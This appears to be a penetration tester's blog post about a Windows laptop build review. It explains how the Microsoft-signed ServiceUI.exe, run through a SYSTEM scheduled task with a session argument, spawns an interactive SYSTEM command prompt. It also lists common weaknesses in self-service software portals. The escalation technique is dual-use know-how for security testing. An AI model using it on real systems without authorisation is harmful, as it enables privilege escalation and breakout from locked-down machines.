Quite a few months ago I performed a laptop build review, standard stuff, see what opportinities there are to escalate privileges and breakout of what was supposed to be a secure build.
After reviewing all the common techniques and vulnerabilities, one of the areas I chose to dive into which proved worthwhile was Microsoft Software Center – or self-service software installation portal.
Microsoft Software Center, allows end-users to install software on demand from a pre-approved catalogue of software and is a common sight in large organisations.
Now this little post isn’t about specific vulnerabilities I found whilst reviewing the self-service portal, it’s about a little useful binary I found during that journey which has proved helpful on more than one occasion since. That said, I’ve since reviewed a few self-service portals and each of them has had exploitable vulnerabilities, so they’re definately an area worth looking into when performing any type of breakout scenario.
Some of the issues I’ve run into are, outdated exploitable software, exploitable software installers/MSI, PATH variable/DLL sideloading, software installing and executing as administrator, installers running from temp folder/replaceable binaries, interactive GUI installers running as SYSTEM.
Anyhow, back to the main point of this post – ServiceUI.exe
ServiceUI.exe is a Microsoft Signed binary which get’s called during the installation process and when run with the correct options, opens the software installer with SYSTEM privileges inside the current user session.
I’m sure you’d all be happy to trust and accept a binary provided by me 🙂 but here’s a link to the Microsoft Deployment Toolkit which contains ServiceUI.exe
Microsoft Deployment Toolkit (MDT)
https://www.microsoft.com/en-us/download/details.aspx?id=54259
Executing ServiceUI.exe from cmd.exe gives the following options.
As a simple test for code execution we can run – serviceui %windir%\notepad.exe
We see that this executes notepad successfully as indicated below.
Now on the basis that we’ve achieved local administrator privileges and we want to gain an interactive SYSTEM shell we can do this using a number of techniques, Task Scheduler being one of the most straightforward to use.
Create a New Task and configure it to Run as the SYSTEM user
Then modify the Actions
The Program/Script part points towards the serviceui.exe binary location and then for the arguments
This needs to indicate the session that you want your binary to run in and the binary you want to execute.
An easy method for figuring out which session you want to run in, is to run ‘query user‘ from the cmd.exe
-session:2 c:\windows\system32\cmd.exe
Running the scheduled task, then gives us a SYSTEM privileged command prompt